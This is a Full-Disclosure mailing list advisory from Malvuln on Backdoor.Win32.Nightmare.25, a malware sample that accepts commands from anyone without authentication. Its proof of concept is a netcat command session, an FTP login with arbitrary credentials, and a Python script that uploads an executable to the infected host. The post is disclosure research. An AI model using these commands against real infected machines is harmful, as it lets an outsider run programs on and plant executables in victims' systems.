lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAAHK0WTqs-7KdsHyz9rbHFskFxsrGW+CSE_y2jAHUHe9QC1B+Q@mail.gmail.com>
Date: Fri, 9 Aug 2024 21:12:27 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Nightmare.25 / Unauthenticated Remote Command
	Execution

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source:
https://malvuln.com/advisory/0fe8f37543e8face08941899add38e35.txt
Contact: malvuln13@...il.com
Media: x.com/malvuln

Threat: Backdoor.Win32.Nightmare.25
Vulnerability: Unauthenticated Remote Command Execution
Family: Nightmare
Type: PE32
MD5: 0fe8f37543e8face08941899add38e35
SHA256: 591e348b2c1f25a23f0acf55ba10a71957683b54a5682902c2fa179ba278fff6
Vuln ID: MVID-2024-0687
Disclosure: 08/09/2024
Description: The malware listens on TCP ports 666, 5401 and 5402.
Third party adversaries who can reach an infected host on TCP port 666
can issue commands made available by the backdoor. The FTPON command
starts an FTP service on TCP port 21, supply any single character
after the command E.g. "FTPON x". Furthermore, the FTP server allows
for any username/password combination for authentication. Attackers
can then upload their own executable to the victim machine using the
FTP STOR command. This can undermine the initial adversary intrusion
allowing potential takeover by a totally different attacking entity.

Commands available:
RUN (run programs)
FTPON x  (starts FTP)
SHOWCHAT x
LOGOFF x  (logs out current user)
KILLAPP
LISTAPP
KILL x (shuts down the backdoor)


Exploit/PoC:
nc64.exe 192.168.18.125 666

RUN MSPAINT.EXE
Program executed

FTPON x
FTP Port open

FTPOFF x
FTP Port close

SHOWCHAT x
Chat is visible  (will launch a chat terminal on the slave)

HIDECHAT x
Chat is invisible

LISTAPP x
*File: Backdoor.Win32.Nightmare.25.0fe8f37543e8face08941899add38e35.exe
- PID: 4284
*Process Hacker [DESKTOP-2C4IQJO\VICTIM]+ (Administrator)
*dump
*Administrator: Administrator Command Prompt
*Program Manager

KILL x
Server not anymore active

LOGOFF x


nc64.exe 192.168.18.125 21
220 P23h FTP Server ready.
USER x
331 Password required for x.
PASS x
230 User x logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
CDUP \
250 CWD command successful. "C:/" is current directory.
MKD TEMP
257 'C:\TEMP': directory created.
PASV
227 Entering Passive Mode (192,168,18,125,226,100).
STOR DOOM_SM.exe
150 Opening data connection for DOOM_SM.exe.
226 File received ok


from socket import *

MALWARE_HOST="192.168.18.125"
PORT=57956  #Calculated port for file transfers 226 * 256 + 100 = 57956
DOOM="DOOM_SM.exe"

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    f = open(DOOM, "rb")
    EXE = f.read()
    s.send(EXE)

    while EXE:
        s.send(EXE)
        EXE=f.read()

    s.close()
    print("By Malvuln");

if __name__=="__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or
otherwise. Permission is hereby granted for the redistribution of this
advisory, provided that it is not altered except by reformatting it,
and that due credit is given. Permission is explicitly given for
insertion in vulnerability databases and similar, provided that due
credit is given to the author. The author is not responsible for any
misuse of the information contained herein and accepts no
responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security
related information or exploits by the author or elsewhere. Do not
attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper
Malware handling or the downloading of ANY Malware mentioned on this
website or elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ